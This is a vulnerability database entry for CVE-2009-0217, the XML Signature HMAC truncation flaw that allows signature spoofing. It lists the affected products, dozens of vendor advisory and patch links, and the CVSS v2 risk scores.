CVE-2009-0217

medium

Description

The design of the W3C XML Signature Syntax and Processing (XMLDsig) recommendation, as implemented in products including (1) the Oracle Security Developer Tools component in Oracle Application Server 10.1.2.3, 10.1.3.4, and 10.1.4.3IM; (2) the WebLogic Server component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, and 8.1 SP6; (3) Mono before 2.4.2.2; (4) XML Security Library before 1.2.12; (5) IBM WebSphere Application Server Versions 6.0 through 6.0.2.33, 6.1 through 6.1.0.23, and 7.0 through 7.0.0.1; (6) Sun JDK and JRE Update 14 and earlier; (7) Microsoft .NET Framework 3.0 through 3.0 SP2, 3.5, and 4.0; and other products uses a parameter that defines an HMAC truncation length (HMACOutputLength) but does not require a minimum for this length, which allows attackers to spoof HMAC-based signatures and bypass authentication by specifying a truncation length with a small number of bits.

References

http://blogs.sun.com/security/entry/cert_vulnerability_note_vu_466161

http://git.gnome.org/cgit/xmlsec/commit/?id=34b349675af9f72eb822837a8772cc1ead7115c7

http://git.gnome.org/cgit/xmlsec/patch/?id=34b349675af9f72eb822837a8772cc1ead7115c7

http://lists.apple.com/archives/security-announce/2009/Sep/msg00000.html

http://lists.opensuse.org/opensuse-security-announce/2009-11/msg00002.html

http://lists.opensuse.org/opensuse-security-announce/2010-03/msg00005.html

http://marc.info/?l=bugtraq&m=125787273209737&w=2

http://osvdb.org/55895

http://osvdb.org/55907

http://secunia.com/advisories/34461

http://secunia.com/advisories/35776

http://secunia.com/advisories/35852

http://secunia.com/advisories/35853

http://secunia.com/advisories/35854

http://secunia.com/advisories/35855

http://secunia.com/advisories/35858

http://secunia.com/advisories/36162

http://secunia.com/advisories/36176

http://secunia.com/advisories/36180

http://secunia.com/advisories/36494

http://secunia.com/advisories/37300

http://secunia.com/advisories/37671

http://secunia.com/advisories/37841

http://secunia.com/advisories/38567

http://secunia.com/advisories/38568

http://secunia.com/advisories/38695

http://secunia.com/advisories/38921

http://secunia.com/advisories/41818

http://secunia.com/advisories/60799

http://sunsolve.sun.com/search/document.do?assetkey=1-21-125136-16-1

http://sunsolve.sun.com/search/document.do?assetkey=1-66-263429-1

http://sunsolve.sun.com/search/document.do?assetkey=1-66-269208-1

http://sunsolve.sun.com/search/document.do?assetkey=1-77-1020710.1-1

http://svn.apache.org/viewvc?revision=794013&view=revision

http://www.aleksey.com/xmlsec/

http://www.debian.org/security/2010/dsa-1995

http://www.gentoo.org/security/en/glsa/glsa-201408-19.xml

http://www.kb.cert.org/vuls/id/466161

http://www.kb.cert.org/vuls/id/MAPG-7TSKXQ

http://www.kb.cert.org/vuls/id/WDON-7TY529

http://www.mandriva.com/security/advisories?name=MDVSA-2009:209

http://www.mono-project.com/Vulnerabilities

http://www.openoffice.org/security/cves/CVE-2009-0217.html

http://www.oracle.com/technetwork/topics/security/cpujul2009-091332.html

http://www.oracle.com/technetwork/topics/security/cpuoct2009-096303.html

http://www.oracle.com/technetwork/topics/security/cpuoct2010-175626.html

http://www.redhat.com/support/errata/RHSA-2009-1694.html

http://www.securityfocus.com/bid/35671

http://www.securitytracker.com/id?1022561

http://www.securitytracker.com/id?1022567

http://www.securitytracker.com/id?1022661

http://www.ubuntu.com/usn/USN-903-1

http://www.us-cert.gov/cas/techalerts/TA09-294A.html

http://www.us-cert.gov/cas/techalerts/TA10-159B.html

http://www.vupen.com/english/advisories/2009/1900

http://www.vupen.com/english/advisories/2009/1908

http://www.vupen.com/english/advisories/2009/1909

http://www.vupen.com/english/advisories/2009/1911

http://www.vupen.com/english/advisories/2009/2543

http://www.vupen.com/english/advisories/2009/3122

http://www.vupen.com/english/advisories/2010/0366

http://www.vupen.com/english/advisories/2010/0635

http://www.w3.org/2008/06/xmldsigcore-errata.html#e03

http://www.w3.org/QA/2009/07/hmac_truncation_in_xml_signatu.html

http://www-01.ibm.com/support/docview.wss?rs=180&context=SSEQTP&dc=D400&uid=swg24023545&loc=en_US&cs=UTF-8&lang=en&rss=ct180websphere

http://www-01.ibm.com/support/docview.wss?rs=180&context=SSEQTP&dc=D400&uid=swg24023723&loc=en_US&cs=UTF-8&lang=en&rss=ct180websphere

http://www-01.ibm.com/support/docview.wss?rs=180&uid=swg21384925

https://bugzilla.redhat.com/show_bug.cgi?id=511915

https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-041

https://issues.apache.org/bugzilla/show_bug.cgi?id=47526

https://issues.apache.org/bugzilla/show_bug.cgi?id=47527

https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10186

https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7158

https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8717

https://rhn.redhat.com/errata/RHSA-2009-1200.html

https://rhn.redhat.com/errata/RHSA-2009-1201.html

https://rhn.redhat.com/errata/RHSA-2009-1428.html

https://rhn.redhat.com/errata/RHSA-2009-1636.html

https://rhn.redhat.com/errata/RHSA-2009-1637.html

https://rhn.redhat.com/errata/RHSA-2009-1649.html

https://rhn.redhat.com/errata/RHSA-2009-1650.html

https://usn.ubuntu.com/826-1/

https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00310.html

https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00325.html

https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00494.html

https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00505.html

Details

Source: MITRE

Published: 2009-07-14

Updated: 2018-10-12

Risk Information

CVSS v2

Base Score: 5

Vector: AV:N/AC:L/Au:N/C:N/I:P/A:N

Impact Score: 2.9

Exploitability Score: 10

Severity: MEDIUM